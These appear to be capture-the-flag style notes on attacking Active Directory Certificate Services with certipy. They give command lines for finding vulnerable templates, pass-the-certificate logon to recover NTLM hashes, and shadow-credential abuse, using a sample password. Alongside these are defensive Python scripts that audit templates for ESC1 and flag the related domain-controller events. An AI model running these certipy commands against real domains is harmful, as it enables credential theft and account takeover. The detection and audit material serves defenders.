## Find ADCS vulns

certipy finds some ESC misconfigurations automatically while enumerating. Expect both false positives and false negatives.

Some ESC attacks are hard to enumerate unless you are in the right conditions.

```bash
# -hashes takes LMHASH:NTHASH; the LM half may be left empty
certipy-ad find -u ca_svc -hashes ':xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' -dc-ip $target -vulnerable
```
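To judge the output of `find -vulnerable` (and spot its false positives and negatives), it helps to see what the ESC1 check actually tests on a template's attributes. The following is an added example for these notes, not certipy's own code: it evaluates the published ESC1 conditions (enrollee supplies subject, no manager approval, no authorized signatures, an authentication-capable EKU, enrollment by a low-privileged principal) over constructed template records. The `Template` class, the `LOW_PRIV_PRINCIPALS` set and the sample data are assumptions; real values would come from the LDAP attributes named in the comments.

```python
"""Audit certificate templates for the ESC1 shape that `certipy find -vulnerable` reports."""
from dataclasses import dataclass

# Attribute bits and OIDs as documented in MS-CRTD and the "Certified Pre-Owned" research.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)

# EKUs that allow a certificate to be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups whose Enroll right makes a template reachable by any user
# (assumption: the template ACL has already been resolved to principal names).
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


@dataclass
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ra_signatures: int      # msPKI-RA-Signature
    ekus: list              # pKIExtendedKeyUsage (empty list = no EKU restriction)
    enroll_principals: set  # principals holding Enroll rights on the template
    enabled: bool = True    # published on at least one CA


def allows_domain_auth(ekus):
    """A template with no EKU at all is usable for any purpose, so it counts too."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_missing_conditions(t):
    """Return the ESC1 conditions this template does NOT meet; an empty list means ESC1."""
    missing = []
    if not t.enabled:
        missing.append("template is not published on any CA")
    if not (t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
        missing.append("enrollee cannot supply the subject (SAN)")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        missing.append("manager approval required")
    if t.ra_signatures > 0:
        missing.append(f"{t.ra_signatures} authorized signature(s) required")
    if not allows_domain_auth(t.ekus):
        missing.append("EKU does not permit domain authentication")
    if not (t.enroll_principals & LOW_PRIV_PRINCIPALS):
        missing.append("no low-privileged principal can enroll")
    return missing


def is_esc1(t):
    return not esc1_missing_conditions(t)


def audit(templates):
    """Map each template name to its ESC1 verdict, for cross-checking tool output."""
    return {t.name: is_esc1(t) for t in templates}


# Constructed sample templates (not taken from any real domain).
SAMPLE_TEMPLATES = [
    Template("DangerousUser", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], {"Domain Users"}),
    Template("ServerCert", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.1"], {"Domain Admins"}),          # server auth only
    Template("ApprovedUser", 0x1, 0x2, 0, ["1.3.6.1.5.5.7.3.2"], {"Authenticated Users"}),  # manager approval
    Template("Unpublished", 0x1, 0x0, 0, [], {"Domain Users"}, enabled=False),
]

if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {'ESC1' if verdict else 'ok'}")
```

The enrollment-rights test is the usual source of disagreement between tools: it depends on how group membership and the CA's own enrollment ACL are resolved, which this example treats as already done.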

## Pass the certificate

Once we have another user's certificate, we can authenticate with it to obtain that user's NTLM hash:

```bash
certipy-ad auth -pfx "administrator.pfx" -dc-ip '172.16.x.x' -username 'user' -domain 'domain'
```

If the PFX is password protected, strip the password first (the exported copy is unprotected):

```bash
certipy-ad cert -export -pfx "administrator.pfx" -password "CERT_PASSWORD" -out "administrator_decrypted.pfx"
```

## Shadow credentials

Don’t know how this works, black magic. Here’s a writeup for more info on the attack.

When you have GenericWrite on an account and ADCS is installed in the domain, certipy can request a certificate for the target account, then a TGT, then the NTLM hash:

```bash
certipy-ad shadow auto -account ca_svc -u p.agila -p 'prometheusx-303' -dc-ip $target
```
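Both flows above leave artifacts on the domain controller: the shadow-credential write shows up as a directory change to `msDS-KeyCredentialLink` (event 5136), and the certificate logon that follows, like the pass-the-certificate logon in the previous section, is a Kerberos TGT request carrying certificate information (event 4768). The following is an added detection example for these notes, not part of certipy. The event records are constructed dicts whose keys mirror the EventData names of those two events; the `ALLOWED_KEYCRED_WRITERS` allowlist and all sample values are assumptions.

```python
"""Flag the log artifacts that a shadow-credential or pass-the-certificate flow leaves on a DC."""
import re

SHADOW_ATTRIBUTE = "msDS-KeyCredentialLink"

# Accounts that legitimately populate msDS-KeyCredentialLink (assumption: site-specific,
# e.g. the identity used by Windows Hello for Business / device registration).
ALLOWED_KEYCRED_WRITERS = set()

# Constructed sample events; account names reuse the notes' placeholders, none are real captures.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "p.agila", "OperationType": "Value Added",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=domain,DC=local", "AttributeLDAPDisplayName": SHADOW_ATTRIBUTE},
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "OperationType": "Value Added",
     "ObjectDN": "CN=j.doe,CN=Users,DC=domain,DC=local", "AttributeLDAPDisplayName": "description"},
    {"EventID": 4768, "TargetUserName": "ca_svc", "IpAddress": "10.10.14.5",
     "CertIssuerName": "domain-DC01-CA", "CertThumbprint": "0123abcd"},
    {"EventID": 4768, "TargetUserName": "j.doe", "IpAddress": "10.10.10.20",
     "CertIssuerName": "", "CertThumbprint": ""},   # ordinary password pre-authentication
]


def account_from_dn(dn):
    """Take the leading CN of a distinguished name as the account name."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else dn


def keycredential_writes(events):
    """5136 events that modify msDS-KeyCredentialLink from a non-allowlisted writer."""
    return [
        (e["SubjectUserName"], account_from_dn(e["ObjectDN"]))
        for e in events
        if e["EventID"] == 5136
        and e["AttributeLDAPDisplayName"].lower() == SHADOW_ATTRIBUTE.lower()
        and e["SubjectUserName"] not in ALLOWED_KEYCRED_WRITERS
    ]


def certificate_logons(events):
    """4768 events where a certificate (PKINIT) rather than a password was used."""
    return [
        (e["TargetUserName"], e["CertIssuerName"], e["IpAddress"])
        for e in events
        if e["EventID"] == 4768 and e.get("CertThumbprint")
    ]


def correlate(events):
    """Accounts with both a key-credential write and a certificate logon.

    Ordering and time window are not enforced here; a production rule would
    require the 5136 to precede the 4768 within a bounded interval.
    """
    written = {target for _, target in keycredential_writes(events)}
    logged_on = {target for target, _, _ in certificate_logons(events)}
    return written & logged_on


if __name__ == "__main__":
    print("key credential writes:", keycredential_writes(SAMPLE_EVENTS))
    print("certificate logons:", certificate_logons(SAMPLE_EVENTS))
    print("likely shadow credential use:", correlate(SAMPLE_EVENTS))
```

Event 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the account objects carry a SACL covering attribute writes; without that, only the 4768 side is visible, which is also all that a plain pass-the-certificate produces.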